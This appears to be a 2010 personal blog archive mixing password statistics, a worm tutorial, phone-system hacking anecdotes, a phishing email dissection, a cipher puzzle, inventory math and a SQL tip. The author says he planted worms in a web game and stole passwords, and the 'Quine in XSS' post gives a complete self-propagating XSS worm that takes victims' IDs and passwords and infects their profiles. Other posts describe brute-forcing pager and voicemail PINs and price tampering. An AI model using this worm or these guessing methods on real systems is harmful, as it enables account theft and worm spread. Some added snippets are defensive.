Sunday, 26 December 2010

Password Pattern Study

I suspect people would only read this if I wrote in Chinese, so I wrote in Chinese. But I guess this time even fewer people will want to read this one.

Recently someone invited me to play a certain web game. The game is full of holes, and later I planted a few worms and stole a pile of passwords, a pile of weak passwords.
What is a weak password? Generally a person has several sets of passwords, each with its own purpose. For sites that matter, such as online banking or your main e-mail, the password should be a random mess that looks like nothing (if your strong password isn't like that, be careful). For sites that don't matter, such as forums that make you register before you can download an attachment, the account name and password are usually just typed at random; those are the weak passwords.
With so many goodies in hand, of course I had to study them. This time the questions are what people most commonly use as weak passwords, and how the password relates to the account name.

Number of data points: 100, from 91 distinct accounts; 5 accounts changed their password once and 2 changed it twice
Account and password restrictions: 4 to 8 alphanumeric characters; the account name must not equal the password (the program enforces this, nothing to do with me)
Data collection method: not telling.

First, just the passwords:

Length distribution:
13% 4 characters
4% 5 characters
23% 6 characters
8% 7 characters
52% 8 characters

Conclusion: passwords are 4 to 8 characters long, with 8 the most common. Even lengths dominate; odd lengths are rarer, only 12%.

Character class distribution:
53% digits only
10% lowercase letters only
0% uppercase letters only

The 100 passwords contain 682 characters in total (4*13+5*4+6*23+7*8+8*52)
74.3% digits (507)
25.2% lowercase letters (172)
0.4% uppercase letters (3)

Conclusion: digits are very popular; all-digit passwords are worth a guessing run.

Per-character distribution:
8.06% - 0
12.17% - 1
10.12% - 2
7.04% - 3
5.72% - 4
5.87% - 5
7.18% - 6
5.87% - 7
5.57% - 8
6.74% - 9

2.79% - a
1.17% - b
0.73% - c
0.59% - d
1.32% - e
0.73% - f
1.61% - g
1.32% - h
2.49% - i
0.15% - j
1.76% - k
1.32% - l
1.03% - m
1.03% - n
0.73% - o
0.59% - p
0.00% - q
1.17% - r
0.88% - s
0.44% - t
1.32% - u
0.15% - v
0.15% - w
0.59% - x
0.59% - y
0.59% - z

0.15% - C
0.15% - K
0.15% - O
0.00% - OTHERS

Digits are the most common, as expected. Digits sorted from most to least frequent:
1, 2, 0, 6, 3, 9, 5, 7, 4, 8

Nobody used a lowercase q; I guess that's because people like typing English words.


Focus: features of the all-digit passwords
4-character passwords:
1100, 1230, 1234, 1234, 1234, 1239, 1397, 2177, 2587, 5354, 6335
Plenty of 123_. Try pressing them on a numpad yourself.

5-character passwords:
24622, 24622
The duplicate is because the guy opened an alt account.

6-character passwords:
061093, 101091, 123321, 159005, 369258, 701226, 753951, 852456, 881029, 941123, 941123, 950219, 951753, 951753

Quite a few look like dates.
ddmmyy: 061093, 101091
yymmdd: 701226, 881029, 941123, 941123, 950219
Others: 123321, 159005, 369258, 753951, 852456, 951753, 951753
Again, try them on a numpad yourself: lots of runs of adjacent keys.

7-character passwords:
4560852
Runs of adjacent keys again.

8-character passwords:
10260816, 10260816, 11181118, 11447788, 13191212, 17138045, 19940403, 19970422, 20001003, 20112012, 24687913, suspected phone number starting with 2 #1, suspected phone number starting with 2 #1, suspected phone number starting with 2 #2, suspected phone number starting with 2 #3, suspected phone number starting with 2 #4, suspected phone number starting with 2 #5, suspected phone number starting with 2 #6, suspected phone number starting with 3 #1, suspected phone number starting with 3 #1, suspected phone number starting with 6 #1, suspected phone number starting with 6 #2, suspected phone number starting with 6 #3, suspected phone number starting with 6 #4, suspected phone number starting with 9 #1

To protect the privacy of the participants (?), some passwords that look like phone numbers are hidden.
Again there are some date-like ones: mmddmmdd, yyyymmdd (yyyyddmm? I don't think so.)

Looks like lots of phone numbers. If you want to guess people's lousy passwords, phone numbers are the best bet.
I'll say more if anyone is interested.
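The patterns the study found, turned into a check a registration form could run, as an added example that is not part of the original post. It flags the numpad key runs, the ddmmyy / yymmdd / yyyymmdd / mmddmmdd date shapes and the 8-digit phone-shaped numbers; the leading digits 2, 3, 6 and 9 for phone numbers are taken from the post's own observation, and the sample list is the post's all-digit passwords with duplicates and hidden numbers removed.

```javascript
// Added example, not from the original post: flag the all-digit patterns the study above
// found (numpad key runs, ddmmyy / yymmdd / yyyymmdd / mmddmmdd dates, 8-digit numbers
// that look like local phone numbers) so a registration form can reject them.

// Straight lines of three adjacent numpad keys: rows, columns, both diagonals, either direction.
const NUMPAD_RUNS = ['123', '456', '789', '147', '258', '369', '159', '357']
  .flatMap(r => [r, r.split('').reverse().join('')]);

const validMD = (mm, dd) => mm >= 1 && mm <= 12 && dd >= 1 && dd <= 31;
const num = (s, a, b) => Number(s.slice(a, b));

// Returns the pattern labels that apply; an empty list means none of the study's patterns matched.
function classify(pw) {
  const labels = [];
  if (!/^\d+$/.test(pw)) return labels;            // only digit-only passwords are analysed here
  labels.push('all-digit');
  if (NUMPAD_RUNS.some(r => pw.includes(r))) labels.push('numpad-run');
  if (pw.length === 6) {
    if (validMD(num(pw, 2, 4), num(pw, 0, 2))) labels.push('date-ddmmyy');
    if (validMD(num(pw, 2, 4), num(pw, 4, 6))) labels.push('date-yymmdd');
  }
  if (pw.length === 8) {
    if (/^(19|20)/.test(pw) && validMD(num(pw, 4, 6), num(pw, 6, 8))) labels.push('date-yyyymmdd');
    if (validMD(num(pw, 0, 2), num(pw, 2, 4)) && validMD(num(pw, 4, 6), num(pw, 6, 8))) labels.push('date-mmddmmdd');
    // Assumption taken from the post's observation: the phone-shaped passwords start with 2, 3, 6 or 9.
    if (/^[2369]/.test(pw)) labels.push('phone-like');
  }
  return labels;
}

function isWeak(pw) { return classify(pw).length > 0; }

// Count how often each label occurs across a list of passwords.
function summarize(list) {
  const counts = {};
  for (const pw of list) for (const l of classify(pw)) counts[l] = (counts[l] || 0) + 1;
  return counts;
}

// The post's own all-digit passwords, de-duplicated; the hidden phone numbers are left out.
const SAMPLE = [
  '1100', '1230', '1234', '1239', '1397', '2177', '2587', '5354', '6335',
  '24622',
  '061093', '101091', '123321', '159005', '369258', '701226',
  '753951', '852456', '881029', '941123', '950219', '951753',
  '4560852',
  '10260816', '11181118', '11447788', '13191212', '17138045',
  '19940403', '19970422', '20001003', '20112012', '24687913',
];

console.log(summarize(SAMPLE));
```

Run on the sample, the date classification agrees with the post's own sorting of the 6-digit passwords, and 12 of the 33 contain a numpad run.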

Tuesday, 21 December 2010

Script Kiddie Class: Quine in XSS

Last time I demonstrated how to create a quine, a program that outputs its own program code. This time I will talk about how malicious JavaScript code can reproduce itself and infect others.

In web applications, one vulnerability critical to users is Cross-site Scripting (XSS), which allows someone to inject client-side script into a web page. The following example is based on a real web game (with some modifications):

Scenario (skip it if you don't like reading bullshxt)
Xyzzy Agora is a multi-player web-based game. Players create their own character to join the virtual adventure. Like other web-based role-playing games, players assign their own ID, password, nickname, color, avatar, battle slogan and website link during registration; all of these except the ID and nickname can be changed afterwards. Players can also allocate additional stat points to their default abilities (5 points each) based on a random number.

After registration, or after logging in, players are redirected to a main street page. From there they can start an adventure, buy weapons or equipment, train their abilities, train their pets, ask NPCs for adventure information, battle other players, change their information, send gifts to other players, send private messages to other players, or go to the chat room. These actions are presented as separate buttons, and each button is the submit button of its own form, which carries the user ID, password and action ID as hidden fields. At the top of every page the users currently online are shown in a row, each linked to the corresponding profile page.

The nickname of a character is displayed as follows:
<font color=**COLOR**>**NICKNAME**</font>
where **COLOR** is the color the player selected from a drop-down list during registration or a profile update, and **NICKNAME** is the nickname picked during registration. The colored nickname is displayed on every page. Other players' colored nicknames can be displayed on a player's profile page, on the private message page, and in the chat room.

Vulnerabilities
1) The color attribute of a player's profile has no proper XSS control. People can inject client-side script into the pages that display other players' nicknames.
2) The user ID and password are stored in hidden fields on every page after login. With XSS, people can extract that data from the DOM easily.
3) The color attribute can be updated on the profile page. Using a quine in the XSS, other players can be infected. The person who originally posted the code can remove it once someone has been infected, which is difficult to trace if there are no proper activity logs.
4) Private messages are only shown to the receiver; the sender has no record of what was sent. For simplicity, the username and password are sent to the attacker by private message instead of to another website. (But this can easily be checked by the web game administrator.)

Steps of Attack
1. Test for the XSS vulnerability by changing the color attribute on the profile update page (profile.php) to:
0><script>alert('XSS')</script
Then the nickname will be displayed like this:
<font color=0><script>alert('XSS')</script>**NICKNAME**</font>
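As an added example (not the game's code), here is the nickname markup from step 1 rendered the vulnerable way, beside a hardened renderer that checks the color against the drop-down's values (the list here is assumed) and escapes the nickname. The same check belongs in profile.php when the value is stored, because the browser-side form can be bypassed, as the GET requests later in this post show.

```javascript
// Added example, not the game's code: the nickname markup from step 1 rendered the
// vulnerable way, beside a hardened renderer. The colour list below is assumed to be
// the options of the profile page's drop-down.
const ALLOWED_COLORS = ['red', 'blue', 'green', 'yellow', 'black', 'white'];

// Vulnerable: the stored colour and nickname are concatenated straight into the tag,
// so a colour such as  0><script>alert('XSS')</script  closes the tag and adds a script.
function renderNicknameVulnerable(color, nickname) {
  return '<font color=' + color + '>' + nickname + '</font>';
}

// Escape the five characters that matter inside element bodies and quoted attributes.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, c => map[c]);
}

// Hardened: the colour must be one of the drop-down values (anything else falls back to a
// default), the attribute is quoted, and the nickname is escaped as text.
function renderNicknameSafe(color, nickname) {
  const wanted = String(color).toLowerCase();
  const safeColor = ALLOWED_COLORS.includes(wanted) ? wanted : 'black';
  return '<font color="' + safeColor + '">' + escapeHtml(nickname) + '</font>';
}
```

Vulnerability 2 needs its own fix: keep the password out of the page entirely and identify the session with a cookie, so a script running in the page has nothing to read.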

2. Identify the target XSS pages:
The highest-traffic page among the potential XSS pages is the chat room, so the script should run properly in the chat room (chat.php). Running on the player profile page and the private message page would be a plus. Bear in mind that a player's own colored name is shown on every page, so you should avoid triggering the program too many times, as private messages are limited.

3. Write a password stealer
This example uses AJAX, since the destination (pm.php) is in the same domain.
function x(){try{return new XMLHttpRequest}catch(e){try{return new ActiveXObject('Microsoft.XMLHTTP')}catch(e){}}}
d=document.forms[0];i=d.uid.value;p=encodeURIComponent(d.pass.value);
u='pm.php?uid='+i+'&pass='+p+'&destid=someone&message='+i+':'+p;
a=x();a.open('GET',u);a.send();
Explanation:
First line: returns the XMLHttpRequest object (copied and modified from jQuery, to keep it short).
Second line: stores the victim's user ID and password, given that the first form on each page holds the user ID in the "uid" field and the password in the "pass" field. encodeURIComponent prevents broken links caused by special characters in the password.
Third line: the page you want the victim to open, which sends the user ID and password to "someone".
Fourth line: sends the GET request via AJAX.

4. Write a code injector
Apart from stealing the password, we are also interested in changing the victim's color attribute to spread the XSS worm. The XMLHttpRequest object and the stored user ID and password are reused in the following script:
v='profile.php?uid='+i+'&pass='+p+'&color=*XSS CODE HERE*';
b=x();b.open('GET',v);b.send()
Now the problem is how to put the entire program, XSS and all, back into the color parameter. The concept of a quine becomes useful here. A JavaScript quine is easier than in other programming languages, since JavaScript can refer to its own function:
function $(){_=$+'$()'}$()
(I intentionally use some funny characters for the function name and variable name)
This code runs the $ function, and the entire program is stored in the _ variable. You can put any code before or after it, like this:
function $(){document.write($+'$()');_=$+'$()';alert(_)}$()
The entire program is still stored in the _ variable.
Now we can put everything together. Before that, I added some shortcut variables for the special characters:
l=String.fromCharCode(60);g=String.fromCharCode(62);
1+3+4 (in one single line):
0><script>
function $(){_=$+'$()';l=String.fromCharCode(60);g=String.fromCharCode(62);
function x(){try{return new XMLHttpRequest}catch(e){try{return new ActiveXObject('Microsoft.XMLHTTP')}catch(e){}}}
d=document.forms[0];i=d.uid.value;p=d.pass.value;
u='pm.php?uid='+i+'&pass='+p+'&destid=someone&message='+i+':'+p;
a=x();a.open('GET',u);a.send();
v='profile.php?uid='+i+'&pass='+p+'&color=0'+encodeURIComponent(g+l+'script'+g+_+l+'/script'); b=x();b.open('GET',v);b.send()}$()
</script
Using this as your color attribute gives the first wave of the XSS worm.

Remark

Referring to a function in JavaScript may add extra line breaks and tabs. I have another piece of code which makes use of eval, and uses unescape for easier coding:
v='q=String.fromCharCode(39);w=%27v=%27+q+v+q+%27;eval(unescape(v))%27;alert(w);';eval(unescape(v))
Replace alert(w) with your code.
Another remark is to consider the program running multiple times. You may use the body onload event to force the XSS code to run once even if it appears in the same page many times. You may also need to add conditions to prevent the code from running on some undesired pages.

If you are interested in this scenario or example, you may ask me for a prototype demo. (Well, I think no one will read this bullshxt :D)

Monday, 20 December 2010

Script Kiddie Class: Quine

How can a program output its own program code at runtime? It can be quite difficult. Let's see an example in VB:

Debug.Print("Code")
The output is Code, but I want the output to be Debug.Print("Code").

Debug.Print("Debug.Print(""Code"")")
Now the output is Debug.Print("Code"), but the program code has changed as well, and now I want Debug.Print("Debug.Print(""Code"")").


It would be rather difficult if you just directly print something. To write a quine program, you should have your program code stored in a string for output.

Example:

Function Q(x) As String
t = Split(x, vbCrLf)
For i = 0 To UBound(t) - 1
Q = Q & Chr(34) & Replace(t(i), Chr(34), Chr(34) & Chr(34)) & Chr(34) & " & vbCrLf & _" & vbCrLf & vbTab & vbTab
Next
Q = Q & Chr(34) & t(i) & Chr(34)
End Function

Sub Form_Load()
V = "Function Q(x) As String" & vbCrLf & _
" t = Split(x, vbCrLf)" & vbCrLf & _
" For i = 0 To UBound(t) - 1" & vbCrLf & _
" Q = Q & Chr(34) & Replace(t(i), Chr(34), Chr(34) & Chr(34)) & Chr(34) & "" & vbCrLf & _"" & vbCrLf & vbTab & vbTab" & vbCrLf & _
" Next" & vbCrLf & _
" Q = Q & Chr(34) & t(i) & Chr(34)" & vbCrLf & _
"End Function" & vbCrLf & _
"" & vbCrLf & _
"Sub Form_Load()" & vbCrLf & _
" V = ?" & vbCrLf & _
" Debug.Print Replace(V, Chr(63), Q(V))" & vbCrLf & _
"End Sub"
Debug.Print Replace(V, Chr(63), Q(V))
End Sub
The entire program is stored in V; the function Q escapes the string, and the question mark (Chr 63) marks where the escaped program code string gets assigned to the variable V.
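The same escape-and-substitute construction in JavaScript, added here as an illustration rather than code from the post: the program text sits in s with a ? placeholder where s's own definition belongs, and JSON.stringify() does the job of Q(), escaping the string into a valid literal.

```javascript
// Added example, not from the post: a JavaScript quine built like the VB one, by
// escaping a template string and substituting it into its own placeholder.
// No comments are placed inside quine() so that its source text is exactly what it prints.
function quine() {
  var s = "function quine() {\n  var s = ?;\n  return s.replace(\"?\", JSON.stringify(s));\n}";
  return s.replace("?", JSON.stringify(s));
}

// Check a candidate: a quine's output must equal its own source text.
function isQuine(fn) {
  return fn() === fn.toString();
}

console.log(quine());
```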



Looks funny but messy. Then what is the purpose of doing this? ... I'll tell you later.

Thursday, 21 October 2010

A long time ago

Today is quite special. For me it's more special than 10-10-10, because 10-21-10 is my 21st birthday.
While I'm at it, some odd tales from a dozen or so years ago. Just take the following as jokes.

-------------------------------------------------
Tonight I originally wanted to order P*xx*H*t (not bothering to let Google work it out). When I got to the single-person set page, only the dinner set was available.
Don't think I'm pulling another gag. The dinner set is forty-something dollars, while afternoon tea is only thirty-five. Of course I'd buy afternoon tea.
So I worked some magic and managed to order at the afternoon tea price. (The experts can try it themselves.)
Just as I was about to submit, I thought: would P*xx*H*t call the police on me? Getting arrested would hardly be worth it.
(Actually I've worked magic before and nothing happened.)

When I was small I never thought about this stuff. If someone had really arrested me a dozen years ago, maybe I'd be more famous now than Chan whatever-hei, who knows.

-------------------------------------------------
A dozen years ago my family had no money (still doesn't), and I had hardly any toys. Other kids played with dolls and robots; I stacked mahjong tiles. Stacking mahjong tiles got boring, there was nothing to play with in the summer holidays, and with nothing to play with you go looking for something.

This thing I'm sure every household has, and it's high-tech.
Washing machine? Parents would never let a kid play with the washing machine. Accidents happen.
Fridge? If so I'd be studying physics now.
TV? Back then I wasn't smart enough to sneak a look at cable TV.
Radio? I wish I were that smart. I know some experts use a radio to eavesdrop.

Guessed it yet? It's the telephone.
Back then phones had no caller ID, so I just dialled at random.

-------------------------------------------------
"Spam"

In the days before caller ID, the usual way to prank someone was to call and say nothing.

Back to playing with the phone. While dialling at random, I hit 2921 二二二二 (not bothering to let Google work it out), and it's still there today. It's actually the Post Office's recorded information hotline. No idea how I ran into that number.

It had a feature to fax you Post Office information. It asked me to enter a fax number, I entered my home phone number, then hung up.
A few minutes later, the phone rang. I picked up and it sounded like the brainwashing scenes in movies: "BiBoBeaBoBeaBoBeaBo BoBeaBoBea.."
So that's the weird noise a fax machine makes when it connects to a phone.


Spam: call a number with a fax service and give someone else's home phone as the fax number.

Since I got a computer, I haven't pulled this trick in a long time.

-------------------------------------------------
"Brute Force 1"

In the early nineties, pagers were still very popular. My dad had one. Normally to page someone you called the paging centre, then told the paging lady who to page and what message to leave.

I remember the paging centre numbers started with 7. Don't ask me the exact number, I really don't remember (no idea why I remember the 2921 one). The worst thing when playing with phones is getting a real person; recordings are the most fun. Later I found that changing one digit of the paging centre number got me a recording.

The first line of the recording was "Welcome to ***" (I don't even remember which company. Pretty poor.)
The second line was "Please enter the pager number".
Usually 4 digits. Then of course I just guessed away.
Once you hit a pager number, it asks you to enter or leave a message, or press * for the management mode.
Of course I pressed *. Then it asked for a password. Passwords were 4 digits or fewer, and 3 wrong guesses would cut you off.


At first I guessed sequences like 1234. Quite a few hits.
Then, out of boredom, I tried the pager number itself. For example, enter 4622, press *, then try 4622.
Not as many hits as 1234, but still some.
Later I heard somewhere that there was a default password, 2828. So I tried 2828, and the success rate was very high, much higher than 1234.

I spent a few days of the summer holiday doing this and filled a dozen or so pages. I'd guess two or three hundred.

Q: A paging centre has at most ten thousand numbers; how did you hit so many?
A: Call another paging centre. Again, changing a few digits got me there. I also found that some accounts had mysterious features, such as voice messages and changing the language.

Q: What did you do after cracking an account?
A: Apart from writing them down, I think I helped some people change their passwords, and listened to a few messages (didn't understand any, I think, since pager messages were probably a bunch of codes).

-------------------------------------------------
"Brute Force 2"

Pagers were popular, but plenty of people used mobile phones too. Back then Hong Kong Telecom had a customer service number 二八八八 1010. That number seemed to have a fax feature too, heh heh.
Later, somehow, I hit 90211010. Seems I always hit "21".
It turned out to be a voicemail Management System.
The voice was the same woman's recording that CSL and PCCW use today.

Again I guessed account numbers (mobile phone numbers), then passwords.
This time it was much harder than the pagers, because they had 8 digits.
Usually I tried 1234, 123456, 12345678 and the account number, sometimes the account number reversed.
Again, 3 tries and you're cut off.

Not two hundred this time, but there should have been a few dozen.
The voicemail box was fun, because you could play with recordings.
You could edit what the mailbox's first line says: "This is…" & custom voice & "Please leave a message after the beep (or dial 9xxx xxxx)"
That "or dial 9xxx xxxx" was another feature. After cracking a pile of accounts, I used this "or dial 9xxx xxxx" to chain them together. Every account in a chain had the same password.

For example, having cracked 90212345, 90224680 and 90288888,
90212345 tells you to dial 90224680
90224680 tells you to dial 90288888
90288888 tells you to dial 90212345
All three accounts had the same password.
A few days later I found that one whole chain of numbers couldn't be accessed any more. That's when I knew something was up.

Later I learned that 9XX11010 was the 1010 voicemail system for 9XXYYYYY, so I was pretty lucky to hit 11010.


Brute Force: the default password is the best guess. Sequences (digits or letters) and the account number are decent choices too.
But I guess nobody uses such dumb passwords these days.

-------------------------------------------------

Back then guessing numbers went so smoothly, as if the numbers were telling me how to guess them.
Now I can't even remember my building's door code.

If you want other anecdotes, ask me to write them.

Sunday, 26 September 2010

Lousy phishing e-mail

From LibertyReserve.com
To "LibertyReserve.com"
Date 26 September 2010, 7:39 PM
Subject Please confirm your e-mail address
Sender rocket.totalwebdesigns.com

==================================
Liberty Reserve Account Information Error
==================================

You are receiving this e-mail because your e-mail address has been detected as invalid. Possible reason: an e-mail sent from Liberty Reserve bounced back to our mailbox. All accounts which bounce mail back will be marked inactive and blocked for a 30-day period. We apologise for the inconvenience, but the safety of your funds is our main priority.

To confirm that your e-mail address is valid, please click on the link below:

https://www.libertyreserve.com/en/customer/confirm.aspx?code=9030054170&action=confirm&info=email&c=WoNsQ

This will keep your Liberty Reserve account active.

The current settings for your account can be viewed and modified at the Liberty Reserve website by choosing the Profile menu selection while accessing your account.

Sincerely,
Liberty Reserve Customer Service






At first glance I thought it was some "Library Reserve". Turns out it's an e-payment system. One look and you know they're out to rob you.

The link actually goes to:
http://www.libertyreserve.com.l-en.l-customer.l-confirm.aspx.l-id.3b.x9.pq.lr.v6.b3.sub4free.de/whois.php?a%63ti%6Fn=l%6F%6Fkup&a%63c%6Funt=www.libertyreserve.com%3C/ti%74le%3E%3Cf%72ame%73et%3E%3Cf%72ame%20%73%72%63%3D%68%74%74%70%3A%2F%2F%70%71%76%2E%74%7A%7A%2E%64%65%2F%3E%3C/f%72ame%3E%3Cnof%72ames%3E%


Not even https.
So slashes are replaced with .l-.
Then the id 3b x9 pq lr vb b3 stuff, no idea what that's pretending to be.
Finally, sub4free.de turns out to be a redirect site. And the link is broken, too.


Then a bunch more weird stuff. Decoded (?):
whois.php?action=lookup&
account=www.libertyreserve.com<frame%20src%3dhttp://pqv.tzz.de><noframes>%
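An added example (not the post's code) that pulls out what a triage of this link needs: the registrable domain behind the brand-shaped host, whether TLS is used, and the percent-encoded query decoded so the injected markup is visible. The input is the URL quoted above; the registrable domain is approximated as the last two host labels, an assumption that holds for .de and .com but not for suffixes like .co.uk.

```javascript
// Added example, not from the original post: extract the facts a phishing triage needs
// from the link above. The sample is the URL quoted in the post (it ends in a stray '%').
const SAMPLE_URL = 'http://www.libertyreserve.com.l-en.l-customer.l-confirm.aspx.l-id.3b.x9.pq.lr.v6.b3.sub4free.de/whois.php?a%63ti%6Fn=l%6F%6Fkup&a%63c%6Funt=www.libertyreserve.com%3C/ti%74le%3E%3Cf%72ame%73et%3E%3Cf%72ame%20%73%72%63%3D%68%74%74%70%3A%2F%2F%70%71%76%2E%74%7A%7A%2E%64%65%2F%3E%3C/f%72ame%3E%3Cnof%72ames%3E%';

// Lenient percent-decoding: decodeURIComponent() throws on the trailing '%', which is
// exactly the kind of malformed input a phishing link tends to carry, so decode only
// well-formed %XX pairs and leave everything else untouched.
function decodeLenient(s) {
  return s.replace(/%([0-9A-Fa-f]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Split a query string into decoded key/value pairs.
function parseQuery(search) {
  const params = {};
  for (const part of search.replace(/^\?/, '').split('&')) {
    if (!part) continue;
    const i = part.indexOf('=');
    const key = decodeLenient(i < 0 ? part : part.slice(0, i));
    params[key] = i < 0 ? '' : decodeLenient(part.slice(i + 1));
  }
  return params;
}

// Registrable domain approximated as the last two labels (assumption: no public-suffix
// list here, which is fine for .de and .com but wrong for suffixes like .co.uk).
function registrableDomain(hostname) {
  return hostname.split('.').slice(-2).join('.');
}

function analyzeUrl(raw, claimedBrandDomain) {
  const u = new URL(raw);
  const registrable = registrableDomain(u.hostname);
  const params = parseQuery(u.search);
  return {
    hostname: u.hostname,
    registrable,
    https: u.protocol === 'https:',
    // the brand's domain appears inside the host, but the host is registered to someone else
    brandSpoof: u.hostname.includes(claimedBrandDomain) && registrable !== claimedBrandDomain,
    params,
    // a decoded parameter that carries HTML tags is an injection attempt against the target page
    injectedMarkup: Object.values(params).some(v => /<[a-z!\/]/i.test(v)),
  };
}

console.log(analyzeUrl(SAMPLE_URL, 'libertyreserve.com'));
```

Decoded fully, the account parameter carries a closing title tag followed by a frameset pointing at another host, which is more than the two tags visible in the partial decode above.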



Screenshots:

Real:

Fake:

The fake one doesn't even hide the PIN input; how fake can you get.
The fake captcha is always 7262, and you don't even need to type it.
Press Next and it posts whatever you typed to the phisher's server.


Typing nothing: goes to lb3.html
With an extra error message: "Error: Invalid Account Number/Passphrase/Login PIN/MasterKey/E-Mail Address. Please try again. "
The captcha is always 2370

With JavaScript turned off, pressing Next goes to lb2.html, which pops up a Thank you.
No idea how that got through. Tripod is really strange.




Conclusion: too fake, too lousy. But an old trick still works.

Friday, 13 August 2010

Rotten luck

Everything went wrong today.
No details.

Sunday, 30 May 2010

Breaking a cipher

Key: LMUL
f(KEY) ->

The code=4rH2grkcMzX%2fFwvVslkbUQ%3d%3d in the image URL is quite interesting.
4rH2grkcMzX/FwvVslkbUQ== is Base64 encoding.

Decoding it gives: 漹??35 梐Y Q
No idea what that is.

Side-channel attack:
Wondering whether I should just submit LMUL every time.

Let's look at other examples


Key: TzzP
f(Key) ->
Code: koc1iZBaIgBLSK/EvweswA==
Decoding gives another pile of garbage characters.

Could it be an XOR cipher?

Saturday, 13 February 2010

Optimum Service Levels

Very odd formulas in the notes. Let me try to prove them.

Find a service level such that profit is maximized:
"Revenue" at service level S for a year
= P(S)
= (Price - "Cost") * Annual Sales * Sales Response(S)
= Trading Margin * Annual Sales * Sales Response(S)
(Why this is "Revenue" ? ...)

Logistics Cost at service level S for a year
= C(S)
= Annual Holding Cost(S)
(I assume ordering cost, material cost and any other cost apart from holding cost are counted in that "Cost".)

Objective function: Y(S) = P(S) - C(S)
Take the derivative, Y'(S) = P'(S) - C'(S)
Function maximized when Y'(S) = 0 <=> P'(S) = C'(S)


Marginal "Revenue" = Trading Margin * Annual Sales * Sales Response Rate
(Sales Response Rate = Change in Sales Response per Unit change in Service Level. Assume it is a constant.)

Marginal Logistics Cost = Change in Annual Holding Cost per Unit change in Service Level
= Annual Holding Cost * Change in number of Inventory per Unit change in Service Level
= (Percentage Annual Holding Cost * Standard Product Cost) * SD of demand during lead time * Change in Z per Unit change in Service Level


Inventory during lead time = Expected Demand + Safety Stock
Increasing Service Level needs to increase Safety Stock (for the extra demand during lead time)

P(Demand < Inventory) = Service Level
P((Demand - Expected Demand)/SD < Safety Stock/SD) = Service Level
P(Z < Safety Stock/SD) = Service Level
Safety Stock = Z_Service Level * SD
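Carrying the optimum through, as an added derivation that is not in the notes. The symbols stand for the quantities named above: M trading margin, A annual sales, r sales response rate, h percentage annual holding cost, c standard product cost, σ SD of demand during lead time, Φ and φ the standard normal CDF and density.

```latex
% Added derivation, not from the notes. Symbols for the quantities above:
% M = trading margin, A = annual sales, r = sales response rate,
% h = percentage annual holding cost, c = standard product cost,
% \sigma = SD of demand during lead time, \Phi, \phi = standard normal CDF and density.
\begin{aligned}
P'(S) &= M A r, \qquad C'(S) = h c \sigma \,\frac{dZ}{dS} \\
S &= \Phi(Z) \;\Rightarrow\; \frac{dS}{dZ} = \phi(Z) \;\Rightarrow\; \frac{dZ}{dS} = \frac{1}{\phi(Z)} \\
P'(S) = C'(S) &\;\Rightarrow\; \phi(Z^\ast) = \frac{h c \sigma}{M A r} \\
\phi(z) = \frac{1}{\sqrt{2\pi}}\, e^{-z^2/2} &\;\Rightarrow\; Z^\ast = \sqrt{-2 \ln\!\left(\sqrt{2\pi}\,\frac{h c \sigma}{M A r}\right)}, \qquad S^\ast = \Phi(Z^\ast)
\end{aligned}
% For Z >= 0, phi(Z) falls as S rises, so C'(S) grows while P'(S) stays constant:
% Y'(S) is decreasing and the stationary point is a maximum.
% An optimum with Z* >= 0 exists only when sqrt(2 pi) h c sigma / (M A r) <= 1; otherwise
% the holding-cost slope already exceeds the margin slope at S = 0.5 and profit falls
% with every increase in service level.
```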



OK. The proof is not fun.
Calculator program will be provided later. (Still thinking.)

Tuesday, 5 January 2010

[SQL]Assign sequential numbers randomly for a particular group of records

Spammer Tang asked me, "How?"
I said, "Why don't you just use PHP?"

Anyway, I got a solution by just using SQL.
Here are the example records:
[table `team`]
id name dept ticket
1 Samuel 1 0
2 Patrick 1 0
3 Arthur 1 0
4 Martin 1 0
5 Ozetta 3 0
6 Alice 2 0
7 Bob 2 0
8 Carol 2 0
9 Dave 2 0
10 Mallory 3 0
11 Steve 3 0
12 Victor 3 0

Now we want to assign 1, 2, 3, 4 randomly to the ticket column where the dept code is 1 (the first 4 records). Here is my solution:
SET @dept = 1;
DROP TABLE IF EXISTS temp_map;
CREATE TABLE temp_map(p INT NOT NULL AUTO_INCREMENT PRIMARY KEY, q INT NOT NULL);
INSERT INTO temp_map (SELECT NULL, id FROM team WHERE dept = @dept);
DROP TABLE IF EXISTS temp_ticket;
CREATE TABLE temp_ticket(u INT NOT NULL AUTO_INCREMENT PRIMARY KEY, v INT NOT NULL);
INSERT INTO temp_ticket (SELECT NULL, p FROM temp_map ORDER BY RAND());
UPDATE team a SET ticket = (SELECT c.v FROM temp_map b, temp_ticket c WHERE a.id = b.q AND b.p = c.u) WHERE dept = @dept;
DROP TABLE temp_map; DROP TABLE temp_ticket;
First we define which dept we are going to assign tickets to. This can also be done easily in PHP, ASP or whatever, depending on your environment.

Then we create two temporary tables for mapping. The first maps the IDs of the original table to a new ascending sequence, because the IDs of the original table that share a dept code may not be contiguous. For example, if the dept code is 3, the mapping looks like this:
p q
1 5
2 10
3 11
4 12

The second table generates a random sequence using ORDER BY RAND(). You may find a faster or more efficient way to do this. Here is one possible result:
u v
1 3
2 4
3 1
4 2
(The v values may differ.)

Finally we update the tickets in the original table using the two tables above. Note the WHERE clause after the sub-query; it prevents other records' tickets from being updated to zero or NULL.

The last line just removes the temporary tables. You may omit it.

Please feel free to leave comments or give any suggestions to this solution.

Friday, 1 January 2010

Walkthrough

Program:
http://ic.ozetta.net/ic.0/p.txt

Others will be posted later.

Cannot log in? That is your fate.